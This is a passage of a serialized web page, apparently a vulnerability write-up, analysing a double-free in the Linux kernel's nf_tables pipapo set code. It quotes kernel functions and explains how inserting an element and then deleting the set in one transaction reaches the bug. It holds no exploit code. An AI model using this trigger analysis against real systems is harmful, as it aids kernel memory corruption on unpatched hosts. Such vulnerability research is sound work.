the ",{"type":25,"tag":82,"props":55925,"children":55927},{"className":55926},[],[55928],{"type":31,"value":54988},{"type":31,"value":55930}," dirty by inserting a new element.",{"type":25,"tag":206,"props":55932,"children":55934},{"className":20473,"code":55933,"language":2254,"meta":7,"style":7},"static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,\n        const struct nft_set_elem *elem,\n        struct nft_elem_priv **elem_priv)\n{\n[...]\n priv->dirty = true;\n[...]\n}\n",[55935],{"type":25,"tag":82,"props":55936,"children":55937},{"__ignoreMap":7},[55938,56008,56037,56062,56069,56076,56105,56112],{"type":25,"tag":216,"props":55939,"children":55940},{"class":6922,"line":6923},[55941,55945,55949,55954,55958,55962,55966,55971,55975,55980,55984,55988,55992,55996,56000,56004],{"type":25,"tag":216,"props":55942,"children":55943},{"style":6936},[55944],{"type":31,"value":55013},{"type":25,"tag":216,"props":55946,"children":55947},{"style":6936},[55948],{"type":31,"value":55142},{"type":25,"tag":216,"props":55950,"children":55951},{"style":7047},[55952],{"type":31,"value":55953}," nft_pipapo_insert",{"type":25,"tag":216,"props":55955,"children":55956},{"style":6964},[55957],{"type":31,"value":1850},{"type":25,"tag":216,"props":55959,"children":55960},{"style":6936},[55961],{"type":31,"value":13611},{"type":25,"tag":216,"props":55963,"children":55964},{"style":6936},[55965],{"type":31,"value":25111},{"type":25,"tag":216,"props":55967,"children":55968},{"style":6964},[55969],{"type":31,"value":55970}," net ",{"type":25,"tag":216,"props":55972,"children":55973},{"style":6953},[55974],{"type":31,"value":8519},{"type":25,"tag":216,"props":55976,"children":55977},{"style":6947},[55978],{"type":31,"value":55979},"net",{"type":25,"tag":216,"props":55981,"children":55982},{"style":6964},[55983],{"type":31,"value":7026},{"type":25,"tag":216,"props":55985,"children":55986},{"style":6936},[55987],{"type":31,"value":13611},{"type":25,"tag":216,"props":55989,"children":55990},{"style":6936},[55991],{"type":31,"value":25111},{"type":25,"tag":216,"props":55993,"children":55994},{"style":6964},[55995],{"type":31,"value":55068},{"type":25,"tag":216,"props":55997,"children":55998},{"style":6953},[55999],{"type":31,"value":8519},{"type":25,"tag":216,"props":56001,"children":56002},{"style":6947},[56003],{"type":31,"value":54988},{"type":25,"tag":216,"props":56005,"children":56006},{"style":6964},[56007],{"type":31,"value":7465},{"type":25,"tag":216,"props":56009,"children":56010},{"class":6922,"line":6769},[56011,56015,56019,56024,56028,56033],{"type":25,"tag":216,"props":56012,"children":56013},{"style":6936},[56014],{"type":31,"value":36864},{"type":25,"tag":216,"props":56016,"children":56017},{"style":6936},[56018],{"type":31,"value":25111},{"type":25,"tag":216,"props":56020,"children":56021},{"style":6964},[56022],{"type":31,"value":56023}," nft_set_elem ",{"type":25,"tag":216,"props":56025,"children":56026},{"style":6953},[56027],{"type":31,"value":8519},{"type":25,"tag":216,"props":56029,"children":56030},{"style":6947},[56031],{"type":31,"value":56032},"elem",{"type":25,"tag":216,"props":56034,"children":56035},{"style":6964},[56036],{"type":31,"value":7465},{"type":25,"tag":216,"props":56038,"children":56039},{"class":6922,"line":6778},[56040,56045,56049,56054,56058],{"type":25,"tag":216,"props":56041,"children":56042},{"style":6936},[56043],{"type":31,"value":56044},"        struct",{"type":25,"tag":216,"props":56046,"children":56047},{"style":6964},[56048],{"type":31,"value":55672},{"type":25,"tag":216,"props":56050,"children":56051},{"style":6953},[56052],{"type":31,"value":56053},"**",{"type":25,"tag":216,"props":56055,"children":56056},{"style":6947},[56057],{"type":31,"value":55681},{"type":25,"tag":216,"props":56059,"children":56060},{"style":6964},[56061],{"type":31,"value":7107},{"type":25,"tag":216,"props":56063,"children":56064},{"class":6922,"line":7005},[56065],{"type":25,"tag":216,"props":56066,"children":56067},{"style":6964},[56068],{"type":31,"value":14836},{"type":25,"tag":216,"props":56070,"children":56071},{"class":6922,"line":7110},[56072],{"type":25,"tag":216,"props":56073,"children":56074},{"style":6964},[56075],{"type":31,"value":14275},{"type":25,"tag":216,"props":56077,"children":56078},{"class":6922,"line":7216},[56079,56084,56088,56093,56097,56101],{"type":25,"tag":216,"props":56080,"children":56081},{"style":6947},[56082],{"type":31,"value":56083}," priv",{"type":25,"tag":216,"props":56085,"children":56086},{"style":6964},[56087],{"type":31,"value":17714},{"type":25,"tag":216,"props":56089,"children":56090},{"style":6947},[56091],{"type":31,"value":56092},"dirty",{"type":25,"tag":216,"props":56094,"children":56095},{"style":6953},[56096],{"type":31,"value":6956},{"type":25,"tag":216,"props":56098,"children":56099},{"style":6936},[56100],{"type":31,"value":16425},{"type":25,"tag":216,"props":56102,"children":56103},{"style":6964},[56104],{"type":31,"value":6967},{"type":25,"tag":216,"props":56106,"children":56107},{"class":6922,"line":7244},[56108],{"type":25,"tag":216,"props":56109,"children":56110},{"style":6964},[56111],{"type":31,"value":14275},{"type":25,"tag":216,"props":56113,"children":56114},{"class":6922,"line":7257},[56115],{"type":25,"tag":216,"props":56116,"children":56117},{"style":6964},[56118],{"type":31,"value":7874},{"type":25,"tag":38,"props":56120,"children":56121},{},[56122],{"type":31,"value":56123},"We also see that when the changes are commited, this flag is then unset.",{"type":25,"tag":206,"props":56125,"children":56127},{"className":20473,"code":56126,"language":2254,"meta":7,"style":7},"static void nft_pipapo_commit(struct nft_set *set)\n{\n[...]\n if (!priv->dirty)\n  return;\n[...]\n priv->dirty = false;\n[...]\n}\n",[56128],{"type":25,"tag":82,"props":56129,"children":56130},{"__ignoreMap":7},[56131,56171,56178,56185,56216,56227,56234,56261,56268],{"type":25,"tag":216,"props":56132,"children":56133},{"class":6922,"line":6923},[56134,56138,56142,56147,56151,56155,56159,56163,56167],{"type":25,"tag":216,"props":56135,"children":56136},{"style":6936},[56137],{"type":31,"value":55013},{"type":25,"tag":216,"props":56139,"children":56140},{"style":6936},[56141],{"type":31,"value":55018},{"type":25,"tag":216,"props":56143,"children":56144},{"style":7047},[56145],{"type":31,"value":56146}," nft_pipapo_commit",{"type":25,"tag":216,"props":56148,"children":56149},{"style":6964},[56150],{"type":31,"value":1850},{"type":25,"tag":216,"props":56152,"children":56153},{"style":6936},[56154],{"type":31,"value":13357},{"type":25,"tag":216,"props":56156,"children":56157},{"style":6964},[56158],{"type":31,"value":55068},{"type":25,"tag":216,"props":56160,"children":56161},{"style":6953},[56162],{"type":31,"value":8519},{"type":25,"tag":216,"props":56164,"children":56165},{"style":6947},[56166],{"type":31,"value":54988},{"type":25,"tag":216,"props":56168,"children":56169},{"style":6964},[56170],{"type":31,"value":7107},{"type":25,"tag":216,"props":56172,"children":56173},{"class":6922,"line":6769},[56174],{"type":25,"tag":216,"props":56175,"children":56176},{"style":6964},[56177],{"type":31,"value":14836},{"type":25,"tag":216,"props":56179,"children":56180},{"class":6922,"line":6778},[56181],{"type":25,"tag":216,"props":56182,"children":56183},{"style":6964},[56184],{"type":31,"value":14275},{"type":25,"tag":216,"props":56186,"children":56187},{"class":6922,"line":7005},[56188,56192,56196,56200,56204,56208,56212],{"type":25,"tag":216,"props":56189,"children":56190},{"style":6973},[56191],{"type":31,"value":19746},{"type":25,"tag":216,"props":56193,"children":56194},{"style":6964},[56195],{"type":31,"value":7016},{"type":25,"tag":216,"props":56197,"children":56198},{"style":6953},[56199],{"type":31,"value":24581},{"type":25,"tag":216,"props":56201,"children":56202},{"style":6947},[56203],{"type":31,"value":55543},{"type":25,"tag":216,"props":56205,"children":56206},{"style":6964},[56207],{"type":31,"value":17714},{"type":25,"tag":216,"props":56209,"children":56210},{"style":6947},[56211],{"type":31,"value":56092},{"type":25,"tag":216,"props":56213,"children":56214},{"style":6964},[56215],{"type":31,"value":7107},{"type":25,"tag":216,"props":56217,"children":56218},{"class":6922,"line":7110},[56219,56223],{"type":25,"tag":216,"props":56220,"children":56221},{"style":6973},[56222],{"type":31,"value":43162},{"type":25,"tag":216,"props":56224,"children":56225},{"style":6964},[56226],{"type":31,"value":6967},{"type":25,"tag":216,"props":56228,"children":56229},{"class":6922,"line":7216},[56230],{"type":25,"tag":216,"props":56231,"children":56232},{"style":6964},[56233],{"type":31,"value":14275},{"type":25,"tag":216,"props":56235,"children":56236},{"class":6922,"line":7244},[56237,56241,56245,56249,56253,56257],{"type":25,"tag":216,"props":56238,"children":56239},{"style":6947},[56240],{"type":31,"value":56083},{"type":25,"tag":216,"props":56242,"children":56243},{"style":6964},[56244],{"type":31,"value":17714},{"type":25,"tag":216,"props":56246,"children":56247},{"style":6947},[56248],{"type":31,"value":56092},{"type":25,"tag":216,"props":56250,"children":56251},{"style":6953},[56252],{"type":31,"value":6956},{"type":25,"tag":216,"props":56254,"children":56255},{"style":6936},[56256],{"type":31,"value":13012},{"type":25,"tag":216,"props":56258,"children":56259},{"style":6964},[56260],{"type":31,"value":6967},{"type":25,"tag":216,"props":56262,"children":56263},{"class":6922,"line":7257},[56264],{"type":25,"tag":216,"props":56265,"children":56266},{"style":6964},[56267],{"type":31,"value":14275},{"type":25,"tag":216,"props":56269,"children":56270},{"class":6922,"line":7275},[56271],{"type":25,"tag":216,"props":56272,"children":56273},{"style":6964},[56274],{"type":31,"value":7874},{"type":25,"tag":38,"props":56276,"children":56277},{},[56278,56280,56285,56287,56292,56294,56299,56301,56306,56308,56314,56316,56322,56324,56329],{"type":31,"value":56279},"We can conclude that as long as we can, in the same transaction, insert a ",{"type":25,"tag":82,"props":56281,"children":56283},{"className":56282},[],[56284],{"type":31,"value":54980},{"type":31,"value":56286}," in the ",{"type":25,"tag":82,"props":56288,"children":56290},{"className":56289},[],[56291],{"type":31,"value":54988},{"type":31,"value":56293}," to make it dirty and then delete the ",{"type":25,"tag":82,"props":56295,"children":56297},{"className":56296},[],[56298],{"type":31,"value":54988},{"type":31,"value":56300},", we will be able to trigger the double-free. But there is another condition: in the commit path, if a ",{"type":25,"tag":82,"props":56302,"children":56304},{"className":56303},[],[56305],{"type":31,"value":54988},{"type":31,"value":56307},"'s ",{"type":25,"tag":82,"props":56309,"children":56311},{"className":56310},[],[56312],{"type":31,"value":56313},"->commit()",{"type":31,"value":56315}," method is executed before its ",{"type":25,"tag":82,"props":56317,"children":56319},{"className":56318},[],[56320],{"type":31,"value":56321},"->destroy()",{"type":31,"value":56323}," method, then the ",{"type":25,"tag":82,"props":56325,"children":56327},{"className":56326},[],[56328],{"type":31,"value":56092},{"type":31,"value":56330}," flag will be unset, and we won't be able to trigger the double-free.",{"type":25,"tag":38,"props":56332,"children":56333},{},[56334],{"type":31,"value":56335},"Let's once again refer to the code and see how these methods are called.",{"type":25,"tag":206,"props":56337,"children":56339},{"className":20473,"code":56338,"language":2254,"meta":7,"style":7},"static int nf_tables_commit(struct net *net, struct sk_buff *skb)\n{\n[...]\n  case NFT_MSG_DELSET:\n  case NFT_MSG_DESTROYSET: // [1]\n   nft_trans_set(trans)->dead = 1; // [2]\n   list_del_rcu(&nft_trans_set(trans)->list);\n   nf_tables_set_notify(&trans->ctx, nft_trans_set(trans),\n          trans->msg_type, GFP_KERNEL);\n   break;\n  case NFT_MSG_NEWSETELEM: // [3]\n[...]\n   if (te->set->ops->commit &&\n       list_empty(&te->set->pending_update)) {\n    list_add_tail(&te->set->pending_update,\n           &set_update_list);\n   }\n[...]\n }\n\n nft_set_commit_update(&set_update_list);\n[...]\n nf_tables_commit_release(net);\n\n return 0;\n}\n",[56340],{"type":25,"tag":82,"props":56341,"children":56342},{"__ignoreMap":7},[56343,56405,56412,56419,56427,56440,56475,56509,56551,56573,56585,56598,56605,56653,56694,56734,56747,56754,56761,56768,56775,56800,56807,56820,56827,56843],{"type":25,"tag":216,"props":56344,"children":56345},{"class":6922,"line":6923},[56346,56350,56354,56359,56363,56367,56371,56375,56379,56383,56387,56392,56396,56401],{"type":25,"tag":216,"props":56347,"children":56348},{"style":6936},[56349],{"type":31,"value":55013},{"type":25,"tag":216,"props":56351,"children":56352},{"style":6936},[56353],{"type":31,"value":55142},{"type":25,"tag":216,"props":56355,"children":56356},{"style":7047},[56357],{"type":31,"value":56358}," nf_tables_commit",{"type":25,"tag":216,"props":56360,"children":56361},{"style":6964},[56362],{"type":31,"value":1850},{"type":25,"tag":216,"props":56364,"children":56365},{"style":6936},[56366],{"type":31,"value":13357},{"type":25,"tag":216,"props":56368,"children":56369},{"style":6964},[56370],{"type":31,"value":55970},{"type":25,"tag":216,"props":56372,"children":56373},{"style":6953},[56374],{"type":31,"value":8519},{"type":25,"tag":216,"props":56376,"children":56377},{"style":6947},[56378],{"type":31,"value":55979},{"type":25,"tag":216,"props":56380,"children":56381},{"style":6964},[56382],{"type":31,"value":7026},{"type":25,"tag":216,"props":56384,"children":56385},{"style":6936},[56386],{"type":31,"value":13357},{"type":25,"tag":216,"props":56388,"children":56389},{"style":6964},[56390],{"type":31,"value":56391}," sk_buff ",{"type":25,"tag":216,"props":56393,"children":56394},{"style":6953},[56395],{"type":31,"value":8519},{"type":25,"tag":216,"props":56397,"children":56398},{"style":6947},[56399],{"type":31,"value":56400},"skb",{"type":25,"tag":216,"props":56402,"children":56403},{"style":6964},[56404],{"type":31,"value":7107},{"type":25,"tag":216,"props":56406,"children":56407},{"class":6922,"line":6769},[56408],{"type":25,"tag":216,"props":56409,"children":56410},{"style":6964},[56411],{"type":31,"value":14836},{"type":25,"tag":216,"props":56413,"children":56414},{"class":6922,"line":6778},[56415],{"type":25,"tag":216,"props":56416,"children":56417},{"style":6964},[56418],{"type":31,"value":14275},{"type":25,"tag":216,"props":56420,"children":56421},{"class":6922,"line":7005},[56422],{"type":25,"tag":216,"props":56423,"children":56424},{"style":6964},[56425],{"type":31,"value":56426},"  case NFT_MSG_DELSET:\n",{"type":25,"tag":216,"props":56428,"children":56429},{"class":6922,"line":7110},[56430,56435],{"type":25,"tag":216,"props":56431,"children":56432},{"style":6964},[56433],{"type":31,"value":56434},"  case NFT_MSG_DESTROYSET:",{"type":25,"tag":216,"props":56436,"children":56437},{"style":6927},[56438],{"type":31,"value":56439}," // [1]\n",{"type":25,"tag":216,"props":56441,"children":56442},{"class":6922,"line":7216},[56443,56448,56453,56458,56462,56466,56470],{"type":25,"tag":216,"props":56444,"children":56445},{"style":7047},[56446],{"type":31,"value":56447},"   nft_trans_set",{"type":25,"tag":216,"props":56449,"children":56450},{"style":6964},[56451],{"type":31,"value":56452},"(trans)->",{"type":25,"tag":216,"props":56454,"children":56455},{"style":6947},[56456],{"type":31,"value":56457},"dead",{"type":25,"tag":216,"props":56459,"children":56460},{"style":6953},[56461],{"type":31,"value":6956},{"type":25,"tag":216,"props":56463,"children":56464},{"style":6989},[56465],{"type":31,"value":8471},{"type":25,"tag":216,"props":56467,"children":56468},{"style":6964},[56469],{"type":31,"value":53043},{"type":25,"tag":216,"props":56471,"children":56472},{"style":6927},[56473],{"type":31,"value":56474}," // [2]\n",{"type":25,"tag":216,"props":56476,"children":56477},{"class":6922,"line":7244},[56478,56483,56487,56491,56496,56500,56505],{"type":25,"tag":216,"props":56479,"children":56480},{"style":7047},[56481],{"type":31,"value":56482},"   list_del_rcu",{"type":25,"tag":216,"props":56484,"children":56485},{"style":6964},[56486],{"type":31,"value":1850},{"type":25,"tag":216,"props":56488,"children":56489},{"style":6953},[56490],{"type":31,"value":7059},{"type":25,"tag":216,"props":56492,"children":56493},{"style":7047},[56494],{"type":31,"value":56495},"nft_trans_set",{"type":25,"tag":216,"props":56497,"children":56498},{"style":6964},[56499],{"type":31,"value":56452},{"type":25,"tag":216,"props":56501,"children":56502},{"style":6947},[56503],{"type":31,"value":56504},"list",{"type":25,"tag":216,"props":56506,"children":56507},{"style":6964},[56508],{"type":31,"value":7797},{"type":25,"tag":216,"props":56510,"children":56511},{"class":6922,"line":7257},[56512,56517,56521,56525,56530,56534,56538,56542,56546],{"type":25,"tag":216,"props":56513,"children":56514},{"style":7047},[56515],{"type":31,"value":56516},"   nf_tables_set_notify",{"type":25,"tag":216,"props":56518,"children":56519},{"style":6964},[56520],{"type":31,"value":1850},{"type":25,"tag":216,"props":56522,"children":56523},{"style":6953},[56524],{"type":31,"value":7059},{"type":25,"tag":216,"props":56526,"children":56527},{"style":6947},[56528],{"type":31,"value":56529},"trans",{"type":25,"tag":216,"props":56531,"children":56532},{"style":6964},[56533],{"type":31,"value":17714},{"type":25,"tag":216,"props":56535,"children":56536},{"style":6947},[56537],{"type":31,"value":24240},{"type":25,"tag":216,"props":56539,"children":56540},{"style":6964},[56541],{"type":31,"value":7026},{"type":25,"tag":216,"props":56543,"children":56544},{"style":7047},[56545],{"type":31,"value":56495},{"type":25,"tag":216,"props":56547,"children":56548},{"style":6964},[56549],{"type":31,"value":56550},"(trans),\n",{"type":25,"tag":216,"props":56552,"children":56553},{"class":6922,"line":7275},[56554,56559,56563,56568],{"type":25,"tag":216,"props":56555,"children":56556},{"style":6947},[56557],{"type":31,"value":56558},"          trans",{"type":25,"tag":216,"props":56560,"children":56561},{"style":6964},[56562],{"type":31,"value":17714},{"type":25,"tag":216,"props":56564,"children":56565},{"style":6947},[56566],{"type":31,"value":56567},"msg_type",{"type":25,"tag":216,"props":56569,"children":56570},{"style":6964},[56571],{"type":31,"value":56572},", GFP_KERNEL);\n",{"type":25,"tag":216,"props":56574,"children":56575},{"class":6922,"line":7296},[56576,56581],{"type":25,"tag":216,"props":56577,"children":56578},{"style":6973},[56579],{"type":31,"value":56580},"   break",{"type":25,"tag":216,"props":56582,"children":56583},{"style":6964},[56584],{"type":31,"value":6967},{"type":25,"tag":216,"props":56586,"children":56587},{"class":6922,"line":7305},[56588,56593],{"type":25,"tag":216,"props":56589,"children":56590},{"style":6964},[56591],{"type":31,"value":56592},"  case NFT_MSG_NEWSETELEM:",{"type":25,"tag":216,"props":56594,"children":56595},{"style":6927},[56596],{"type":31,"value":56597}," // [3]\n",{"type":25,"tag":216,"props":56599,"children":56600},{"class":6922,"line":7557},[56601],{"type":25,"tag":216,"props":56602,"children":56603},{"style":6964},[56604],{"type":31,"value":14275},{"type":25,"tag":216,"props":56606,"children":56607},{"class":6922,"line":7574},[56608,56613,56617,56622,56626,56630,56634,56639,56643,56648],{"type":25,"tag":216,"props":56609,"children":56610},{"style":6973},[56611],{"type":31,"value":56612},"   if",{"type":25,"tag":216,"props":56614,"children":56615},{"style":6964},[56616],{"type":31,"value":7016},{"type":25,"tag":216,"props":56618,"children":56619},{"style":6947},[56620],{"type":31,"value":56621},"te",{"type":25,"tag":216,"props":56623,"children":56624},{"style":6964},[56625],{"type":31,"value":17714},{"type":25,"tag":216,"props":56627,"children":56628},{"style":6947},[56629],{"type":31,"value":54988},{"type":25,"tag":216,"props":56631,"children":56632},{"style":6964},[56633],{"type":31,"value":17714},{"type":25,"tag":216,"props":56635,"children":56636},{"style":6947},[56637],{"type":31,"value":56638},"ops",{"type":25,"tag":216,"props":56640,"children":56641},{"style":6964},[56642],{"type":31,"value":17714},{"type":25,"tag":216,"props":56644,"children":56645},{"style":6947},[56646],{"type":31,"value":56647},"commit",{"type":25,"tag":216,"props":56649,"children":56650},{"style":6953},[56651],{"type":31,"value":56652}," &&\n",{"type":25,"tag":216,"props":56654,"children":56655},{"class":6922,"line":7591},[56656,56661,56665,56669,56673,56677,56681,56685,56690],{"type":25,"tag":216,"props":56657,"children":56658},{"style":7047},[56659],{"type":31,"value":56660},"       list_empty",{"type":25,"tag":216,"props":56662,"children":56663},{"style":6964},[56664],{"type":31,"value":1850},{"type":25,"tag":216,"props":56666,"children":56667},{"style":6953},[56668],{"type":31,"value":7059},{"type":25,"tag":216,"props":56670,"children":56671},{"style":6947},[56672],{"type":31,"value":56621},{"type":25,"tag":216,"props":56674,"children":56675},{"style":6964},[56676],{"type":31,"value":17714},{"type":25,"tag":216,"props":56678,"children":56679},{"style":6947},[56680],{"type":31,"value":54988},{"type":25,"tag":216,"props":56682,"children":56683},{"style":6964},[56684],{"type":31,"value":17714},{"type":25,"tag":216,"props":56686,"children":56687},{"style":6947},[56688],{"type":31,"value":56689},"pending_update",{"type":25,"tag":216,"props":56691,"children":56692},{"style":6964},[56693],{"type":31,"value":39157},{"type":25,"tag":216,"props":56695,"children":56696},{"class":6922,"line":7604},[56697,56702,56706,56710,56714,56718,56722,56726,56730],{"type":25,"tag":216,"props":56698,"children":56699},{"style":7047},[56700],{"type":31,"value":56701},"    list_add_tail",{"type":25,"tag":216,"props":56703,"children":56704},{"style":6964},[56705],{"type":31,"value":1850},{"type":25,"tag":216,"props":56707,"children":56708},{"style":6953},[56709],{"type":31,"value":7059},{"type":25,"tag":216,"props":56711,"children":56712},{"style":6947},[56713],{"type":31,"value":56621},{"type":25,"tag":216,"props":56715,"children":56716},{"style":6964},[56717],{"type":31,"value":17714},{"type":25,"tag":216,"props":56719,"children":56720},{"style":6947},[56721],{"type":31,"value":54988},{"type":25,"tag":216,"props":56723,"children":56724},{"style":6964},[56725],{"type":31,"value":17714},{"type":25,"tag":216,"props":56727,"children":56728},{"style":6947},[56729],{"type":31,"value":56689},{"type":25,"tag":216,"props":56731,"children":56732},{"style":6964},[56733],{"type":31,"value":7465},{"type":25,"tag":216,"props":56735,"children":56736},{"class":6922,"line":7613},[56737,56742],{"type":25,"tag":216,"props":56738,"children":56739},{"style":6953},[56740],{"type":31,"value":56741},"           &",{"type":25,"tag":216,"props":56743,"children":56744},{"style":6964},[56745],{"type":31,"value":56746},"set_update_list);\n",{"type":25,"tag":216,"props":56748,"children":56749},{"class":6922,"line":7636},[56750],{"type":25,"tag":216,"props":56751,"children":56752},{"style":6964},[56753],{"type":31,"value":38711},{"type":25,"tag":216,"props":56755,"children":56756},{"class":6922,"line":7645},[56757],{"type":25,"tag":216,"props":56758,"children":56759},{"style":6964},[56760],{"type":31,"value":14275},{"type":25,"tag":216,"props":56762,"children":56763},{"class":6922,"line":7654},[56764],{"type":25,"tag":216,"props":56765,"children":56766},{"style":6964},[56767],{"type":31,"value":13552},{"type":25,"tag":216,"props":56769,"children":56770},{"class":6922,"line":7722},[56771],{"type":25,"tag":216,"props":56772,"children":56773},{"emptyLinePlaceholder":16},[56774],{"type":31,"value":7642},{"type":25,"tag":216,"props":56776,"children":56777},{"class":6922,"line":7730},[56778,56783,56787,56791,56796],{"type":25,"tag":216,"props":56779,"children":56780},{"style":7047},[56781],{"type":31,"value":56782}," nft_set_commit_update",{"type":25,"tag":216,"props":56784,"children":56785},{"style":6964},[56786],{"type":31,"value":1850},{"type":25,"tag":216,"props":56788,"children":56789},{"style":6953},[56790],{"type":31,"value":7059},{"type":25,"tag":216,"props":56792,"children":56793},{"style":6947},[56794],{"type":31,"value":56795},"set_update_list",{"type":25,"tag":216,"props":56797,"children":56798},{"style":6964},[56799],{"type":31,"value":7797},{"type":25,"tag":216,"props":56801,"children":56802},{"class":6922,"line":7760},[56803],{"type":25,"tag":216,"props":56804,"children":56805},{"style":6964},[56806],{"type":31,"value":14275},{"type":25,"tag":216,"props":56808,"children":56809},{"class":6922,"line":7768},[56810,56815],{"type":25,"tag":216,"props":56811,"children":56812},{"style":7047},[56813],{"type":31,"value":56814}," nf_tables_commit_release",{"type":25,"tag":216,"props":56816,"children":56817},{"style":6964},[56818],{"type":31,"value":56819},"(net);\n",{"type":25,"tag":216,"props":56821,"children":56822},{"class":6922,"line":7800},[56823],{"type":25,"tag":216,"props":56824,"children":56825},{"emptyLinePlaceholder":16},[56826],{"type":31,"value":7642},{"type":25,"tag":216,"props":56828,"children":56829},{"class":6922,"line":7808},[56830,56835,56839],{"type":25,"tag":216,"props":56831,"children":56832},{"style":6973},[56833],{"type":31,"value":56834}," return",{"type":25,"tag":216,"props":56836,"children":56837},{"style":6989},[56838],{"type":31,"value":6992},{"type":25,"tag":216,"props":56840,"children":56841},{"style":6964},[56842],{"type":31,"value":6967},{"type":25,"tag":216,"props":56844,"children":56845},{"class":6922,"line":7868},[56846],{"type":25,"tag":216,"props":56847,"children":56848},{"style":6964},[56849],{"type":31,"value":7874},{"type":25,"tag":38,"props":56851,"children":56852},{},[56853,56854,56860,56862,56867],{"type":31,"value":474},{"type":25,"tag":82,"props":56855,"children":56857},{"className":56856},[],[56858],{"type":31,"value":56859},"nft_set_commit_update()",{"type":31,"value":56861}," function in the code above will call the ",{"type":25,"tag":82,"props":56863,"children":56865},{"className":56864},[],[56866],{"type":31,"value":56313},{"type":31,"value":56868}," method for any objects that were marked as pending an update.",{"type":25,"tag":206,"props":56870,"children":56872},{"className":20473,"code":56871,"language":2254,"meta":7,"style":7},"static void nft_set_commit_update(struct list_head *set_update_list)\n{\n struct nft_set *set, *next;\n\n list_for_each_entry_safe(set, next, set_update_list, pending_update) {\n  list_del_init(&set->pending_update);\n\n  if (!set->ops->commit || set->dead) // [4]\n   continue;\n\n  set->ops->commit(set); // [5]\n }\n}\n",[56873],{"type":25,"tag":82,"props":56874,"children":56875},{"__ignoreMap":7},[56876,56916,56923,56952,56959,56972,57004,57011,57072,57083,57090,57124,57131],{"type":25,"tag":216,"props":56877,"children":56878},{"class":6922,"line":6923},[56879,56883,56887,56891,56895,56899,56904,56908,56912],{"type":25,"tag":216,"props":56880,"children":56881},{"style":6936},[56882],{"type":31,"value":55013},{"type":25,"tag":216,"props":56884,"children":56885},{"style":6936},[56886],{"type":31,"value":55018},{"type":25,"tag":216,"props":56888,"children":56889},{"style":7047},[56890],{"type":31,"value":56782},{"type":25,"tag":216,"props":56892,"children":56893},{"style":6964},[56894],{"type":31,"value":1850},{"type":25,"tag":216,"props":56896,"children":56897},{"style":6936},[56898],{"type":31,"value":13357},{"type":25,"tag":216,"props":56900,"children":56901},{"style":6964},[56902],{"type":31,"value":56903}," list_head ",{"type":25,"tag":216,"props":56905,"children":56906},{"style":6953},[56907],{"type":31,"value":8519},{"type":25,"tag":216,"props":56909,"children":56910},{"style":6947},[56911],{"type":31,"value":56795},{"type":25,"tag":216,"props":56913,"children":56914},{"style":6964},[56915],{"type":31,"value":7107},{"type":25,"tag":216,"props":56917,"children":56918},{"class":6922,"line":6769},[56919],{"type":25,"tag":216,"props":56920,"children":56921},{"style":6964},[56922],{"type":31,"value":14836},{"type":25,"tag":216,"props":56924,"children":56925},{"class":6922,"line":6778},[56926,56930,56934,56938,56943,56947],{"type":25,"tag":216,"props":56927,"children":56928},{"style":6936},[56929],{"type":31,"value":25111},{"type":25,"tag":216,"props":56931,"children":56932},{"style":6964},[56933],{"type":31,"value":55068},{"type":25,"tag":216,"props":56935,"children":56936},{"style":6953},[56937],{"type":31,"value":8519},{"type":25,"tag":216,"props":56939,"children":56940},{"style":6964},[56941],{"type":31,"value":56942},"set, ",{"type":25,"tag":216,"props":56944,"children":56945},{"style":6953},[56946],{"type":31,"value":8519},{"type":25,"tag":216,"props":56948,"children":56949},{"style":6964},[56950],{"type":31,"value":56951},"next;\n",{"type":25,"tag":216,"props":56953,"children":56954},{"class":6922,"line":7005},[56955],{"type":25,"tag":216,"props":56956,"children":56957},{"emptyLinePlaceholder":16},[56958],{"type":31,"value":7642},{"type":25,"tag":216,"props":56960,"children":56961},{"class":6922,"line":7110},[56962,56967],{"type":25,"tag":216,"props":56963,"children":56964},{"style":7047},[56965],{"type":31,"value":56966}," list_for_each_entry_safe",{"type":25,"tag":216,"props":56968,"children":56969},{"style":6964},[56970],{"type":31,"value":56971},"(set, next, set_update_list, pending_update) {\n",{"type":25,"tag":216,"props":56973,"children":56974},{"class":6922,"line":7216},[56975,56980,56984,56988,56992,56996,57000],{"type":25,"tag":216,"props":56976,"children":56977},{"style":7047},[56978],{"type":31,"value":56979},"  list_del_init",{"type":25,"tag":216,"props":56981,"children":56982},{"style":6964},[56983],{"type":31,"value":1850},{"type":25,"tag":216,"props":56985,"children":56986},{"style":6953},[56987],{"type":31,"value":7059},{"type":25,"tag":216,"props":56989,"children":56990},{"style":6947},[56991],{"type":31,"value":54988},{"type":25,"tag":216,"props":56993,"children":56994},{"style":6964},[56995],{"type":31,"value":17714},{"type":25,"tag":216,"props":56997,"children":56998},{"style":6947},[56999],{"type":31,"value":56689},{"type":25,"tag":216,"props":57001,"children":57002},{"style":6964},[57003],{"type":31,"value":7797},{"type":25,"tag":216,"props":57005,"children":57006},{"class":6922,"line":7244},[57007],{"type":25,"tag":216,"props":57008,"children":57009},{"emptyLinePlaceholder":16},[57010],{"type":31,"value":7642},{"type":25,"tag":216,"props":57012,"children":57013},{"class":6922,"line":7257},[57014,57018,57022,57026,57030,57034,57038,57042,57046,57050,57055,57059,57063,57067],{"type":25,"tag":216,"props":57015,"children":57016},{"style":6973},[57017],{"type":31,"value":35356},{"type":25,"tag":216,"props":57019,"children":57020},{"style":6964},[57021],{"type":31,"value":7016},{"type":25,"tag":216,"props":57023,"children":57024},{"style":6953},[57025],{"type":31,"value":24581},{"type":25,"tag":216,"props":57027,"children":57028},{"style":6947},[57029],{"type":31,"value":54988},{"type":25,"tag":216,"props":57031,"children":57032},{"style":6964},[57033],{"type":31,"value":17714},{"type":25,"tag":216,"props":57035,"children":57036},{"style":6947},[57037],{"type":31,"value":56638},{"type":25,"tag":216,"props":57039,"children":57040},{"style":6964},[57041],{"type":31,"value":17714},{"type":25,"tag":216,"props":57043,"children":57044},{"style":6947},[57045],{"type":31,"value":56647},{"type":25,"tag":216,"props":57047,"children":57048},{"style":6953},[57049],{"type":31,"value":27654},{"type":25,"tag":216,"props":57051,"children":57052},{"style":6947},[57053],{"type":31,"value":57054}," set",{"type":25,"tag":216,"props":57056,"children":57057},{"style":6964},[57058],{"type":31,"value":17714},{"type":25,"tag":216,"props":57060,"children":57061},{"style":6947},[57062],{"type":31,"value":56457},{"type":25,"tag":216,"props":57064,"children":57065},{"style":6964},[57066],{"type":31,"value":1888},{"type":25,"tag":216,"props":57068,"children":57069},{"style":6927},[57070],{"type":31,"value":57071}," // 